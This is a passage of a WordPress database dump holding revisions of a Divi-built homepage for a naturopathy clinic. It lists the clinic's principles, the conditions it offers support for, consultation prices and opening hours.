admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" custom_padding=\"7px|||||\" hover_enabled=\"0\" title_text=\"Untitled design\" background_enable_image=\"on\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-04-09 21:15:36','2025-04-09 13:15:36','',28,'https://verdenaturopathy.com.au/?p=464',0,'revision','',0),(423,1,'2025-04-01 19:54:02','2025-04-01 11:54:02','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]\n<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>\n[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n <li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n <li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n <li><span style=\"font-family: Montserrat;\">treat the person as a whole</span></li>\n <li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">We can support health in many conditions, including:</span>\n<ul>\n <li><span style=\"font-family: Montserrat;\">digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></li>\n <li><span style=\"font-family: Montserrat;\">nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></li>\n <li><span style=\"font-family: Montserrat;\">metabolic dysfunction (insulin resistance)</span></li>\n <li><span style=\"font-family: Montserrat;\">immune dysfunction (autoimmunity, recurrent infections)</span></li>\n <li><span style=\"font-family: Montserrat;\">thyroid conditions (hyper/hypothyroidism)</span></li>\n <li><span style=\"font-family: Montserrat;\">women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></li>\n <li><span style=\"font-family: Montserrat;\">skin health (acne, eczema/dermatitis, rosacea)</span></li>\n <li><span style=\"font-family: Montserrat;\">cardiovascular health (chronic inflammation, high cholesterol)</span></li>\n <li><span style=\"font-family: Montserrat;\">men\'s health (prostate issues, sexual health)</span></li>\n <li><span style=\"font-family: Montserrat;\">children\'s health (poor immunity, digestive issues, behavioural issues)</span></li>\n</ul>\n<span style=\"font-family: Montserrat;\">Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span>\n\n<span style=\"font-family: Montserrat;\">We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]\n<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]\n<h3></h3>\n[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]\n<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-04-01 19:54:02','2025-04-01 11:54:02','',28,'https://verdenaturopathy.com.au/?p=423',0,'revision','',0),(420,1,'2025-04-01 10:52:56','2025-04-01 02:52:56','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" width=\"100%\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" 